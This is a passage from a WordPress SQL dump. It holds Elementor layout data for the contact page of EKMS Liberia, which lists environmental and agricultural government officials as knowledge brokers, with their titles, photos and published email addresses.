href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24730,3662,'_elementor_edit_mode','builder'),(24731,3662,'_elementor_template_type','wp-page'),(24732,3662,'_elementor_version','3.0.16'),(24733,3662,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (24734,3662,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a 